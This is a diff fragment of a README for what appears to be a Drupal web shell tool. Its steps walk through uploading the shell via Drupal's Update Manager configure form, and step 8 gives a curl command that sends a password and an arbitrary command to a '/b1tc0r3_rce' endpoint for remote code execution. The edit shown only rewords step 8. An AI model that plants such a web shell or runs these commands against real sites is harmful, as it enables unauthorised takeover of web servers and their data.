B1TC0R3/drupal_webshell/README.md

 5. Left-click on the descrption of "Update Manager".
 I know, Drupals extension menu is not the most well designed.
 6. Click on "Configure".
 7. Upload the file through the web form that should not be open.
-8. Commands can now execute commands like this:
+8. You can now execute commands like this:

 ```bash
 curl 'http://ADDR/b1tc0r3_rce?proof=PASSWORD&command=COMMAND'